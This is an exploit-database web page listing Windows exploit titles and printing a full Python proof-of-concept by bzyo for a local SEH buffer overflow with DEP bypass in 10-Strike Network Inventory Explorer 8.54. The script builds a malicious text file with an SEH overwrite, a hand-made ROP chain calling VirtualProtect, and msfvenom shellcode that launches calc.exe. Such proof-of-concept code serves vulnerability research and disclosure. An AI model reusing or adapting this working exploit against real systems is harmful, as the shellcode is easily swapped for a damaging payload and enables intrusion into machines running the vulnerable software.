Menu

Improved exploit search engine. Try it out

"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)"

Author

bzyo

Platform

windows

Release date

2019-01-30

Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-21 "Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-05-17 "Iperius Backup 6.1.0 - Privilege Escalation" local windows bzyo
2019-05-06 "NSClient++ 0.5.2.35 - Privilege Escalation" local windows bzyo
2019-02-14 "exacqVision ESM 5.12.2 - Privilege Escalation" local windows bzyo
2019-01-30 "10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-28 "Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-11 "Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)" local windows bzyo
2019-01-10 "RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-20 "Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)" local windows bzyo
2018-12-20 "LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)" local windows_x86 bzyo
2018-12-11 "PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion" webapps multiple bzyo
2018-09-12 "SynaMan 4.0 build 1488 - SMTP Credential Disclosure" webapps windows bzyo
2018-09-12 "SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)" webapps windows bzyo
2018-04-18 "Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities" webapps xml bzyo
2018-02-27 "GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)" remote windows bzyo
2018-08-06 "AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Privilege Escalation" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)" local windows bzyo
2018-04-24 "RGui 3.4.4 - Local Buffer Overflow" local windows bzyo
2018-04-17 "Reaper 5.78 - Local Buffer Overflow" local windows bzyo
2018-04-09 "GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)" local windows bzyo
2018-04-02 "WebLog Expert Enterprise 9.4 - Privilege Escalation" local windows bzyo
2018-03-26 "LabF nfsAxe 3.7 - Privilege Escalation" local windows bzyo
2018-03-05 "Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow" local windows bzyo
2018-03-02 "IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)" local windows bzyo
2018-03-02 "IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)" local windows bzyo
2018-05-06 "HWiNFO 5.82-3410 - Denial of Service" dos windows bzyo
2018-03-23 "WM Recorder 16.8.1 - Denial of Service" dos windows bzyo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46283/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46283/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46283/40756/10-strike-network-inventory-explorer-854-local-buffer-overflow-sehdep-bypass/download/", "exploit_id": "46283", "exploit_description": "\"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)\"", "exploit_date": "2019-01-30", "exploit_author": "bzyo", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
#!/usr/bin/python

# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-29-19
# Vulnerable Software: 10-Strike Network Inventory Explorer 8.54
# Vendor Homepage: https://www.10-strike.com/
# Version: 8.54 
# Software Link 1: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open app, select Computers tab  
# 3. click on 'From Text File'
# 4. choose 10strike.txt that was generated 
# 5. pop calc

# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
# practicing dep bypass by not using auto generated mona.py ropchains

# original seh poc from Hashim Jawad, EDB: 44838
# notes from author state offset is based upon username size, username for poc is 'user'

# badchars; \x00\x0a\x0d\x2f

import struct

filename = "10strike.txt"

junk  = "\x41" * 209

seh = struct.pack('<L',0x10013e29)

fill = "\x42"*12

#VirtualProtect()
#ESI = ptr to VirtualProtect()
rop = struct.pack('<L',0x7c3762b3)   # POP EAX # RETN 
rop += struct.pack('<L',0x61e9b30c)  # ptr to &VirtualProtect() 
rop += struct.pack('<L',0x1001872e)  # MOV EAX,DWORD PTR DS:[EAX] # RETN 
rop += struct.pack('<L',0x100101f2)  # POP EBX # RETN 
rop += struct.pack('<L',0xffffffff)  #
rop += struct.pack('<L',0x100186d1)  # ADD EBX,EAX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x7c358a01)  # INC EBX # XOR EAX,EAX # RETN 
rop += struct.pack('<L',0x7c3501d5)  # POP ESI # RETN
rop += struct.pack('<L',0xffffffff)  #
rop += struct.pack('<L',0x61e8509c)  # ADD ESI,EBX # RETN 
rop += struct.pack('<L',0x7c370464)  # INC ESI # RETN 

#EBP = ReturnTo (ptr to jmp esp)
#mona.py jmp -r esp -cpb '\x00\x0a\x0d'
rop += struct.pack('<L',0x61e05892)  # POP EBP # RETN 
rop += struct.pack('<L',0x61e053a9)  # push esp # ret

#EBX = dwSize x201
rop += struct.pack('<L',0x7c348495)  # POP EAX # RETN 
rop += struct.pack('<L',0xfffffdff)  # 
rop += struct.pack('<L',0x7c351e05)  # NEG EAX # RETN 
rop += struct.pack('<L',0x100101f2)  # POP EBX # RETN 
rop += struct.pack('<L',0xffffffff)  #  
rop += struct.pack('<L',0x61e0579d)  # INC EBX # RETN 
rop += struct.pack('<L',0x100186d1)  # ADD EBX,EAX # XOR EAX,EAX # RETN 
	  
#EDX = NewProtect (0x40)
rop += struct.pack('<L',0x7c344160)  # POP EDX # RETN 
rop += struct.pack('<L',0xffffffc0)  # 
rop += struct.pack('<L',0x7c351eb1)  # NEG EDX # RETN 
	  
#ECX = lpOldProtect (ptr to W address)
rop += struct.pack('<L',0x7c37157a)  # POP ECX # RETN
rop += struct.pack('<L',0x61e894c0)  # &Writable location sqlite3

#EDI = ROP NOP (RETN)
rop += struct.pack('<L',0x1001ab53)  # POP EDI # RETN
rop += struct.pack('<L',0x1001ab54)  # ROP-NOP 
	  
#EAX = NOP (0x90909090)
rop += struct.pack('<L',0x7c3647cc)  # POP EAX # RETN 
rop += struct.pack('<L',0x90909090)  # nop

#PUSHAD
rop += struct.pack('<L',0x10019094)  # PUSHAD # RETN 

nops = "\x90"*10

#msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d\x3a\x5c' -f python
#Payload size: 220 bytes
calc =  ""
calc += "\xbb\x29\x86\xf9\x07\xda\xdb\xd9\x74\x24\xf4\x5e\x31"
calc += "\xc9\xb1\x31\x31\x5e\x13\x83\xee\xfc\x03\x5e\x26\x64"
calc += "\x0c\xfb\xd0\xea\xef\x04\x20\x8b\x66\xe1\x11\x8b\x1d"
calc += "\x61\x01\x3b\x55\x27\xad\xb0\x3b\xdc\x26\xb4\x93\xd3"
calc += "\x8f\x73\xc2\xda\x10\x2f\x36\x7c\x92\x32\x6b\x5e\xab"
calc += "\xfc\x7e\x9f\xec\xe1\x73\xcd\xa5\x6e\x21\xe2\xc2\x3b"
calc += "\xfa\x89\x98\xaa\x7a\x6d\x68\xcc\xab\x20\xe3\x97\x6b"
calc += "\xc2\x20\xac\x25\xdc\x25\x89\xfc\x57\x9d\x65\xff\xb1"
calc += "\xec\x86\xac\xff\xc1\x74\xac\x38\xe5\x66\xdb\x30\x16"
calc += "\x1a\xdc\x86\x65\xc0\x69\x1d\xcd\x83\xca\xf9\xec\x40"
calc += "\x8c\x8a\xe2\x2d\xda\xd5\xe6\xb0\x0f\x6e\x12\x38\xae"
calc += "\xa1\x93\x7a\x95\x65\xf8\xd9\xb4\x3c\xa4\x8c\xc9\x5f"
calc += "\x07\x70\x6c\x2b\xa5\x65\x1d\x76\xa3\x78\x93\x0c\x81"
calc += "\x7b\xab\x0e\xb5\x13\x9a\x85\x5a\x63\x23\x4c\x1f\x9b"
calc += "\x69\xcd\x09\x34\x34\x87\x08\x59\xc7\x7d\x4e\x64\x44"
calc += "\x74\x2e\x93\x54\xfd\x2b\xdf\xd2\xed\x41\x70\xb7\x11"
calc += "\xf6\x71\x92\x71\x99\xe1\x7e\x58\x3c\x82\xe5\xa4"

pad = "\x45"*(3000 - len(junk + seh + fill + rop + nops + calc))

buffer = junk + seh + fill + rop + nops + calc + pad

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()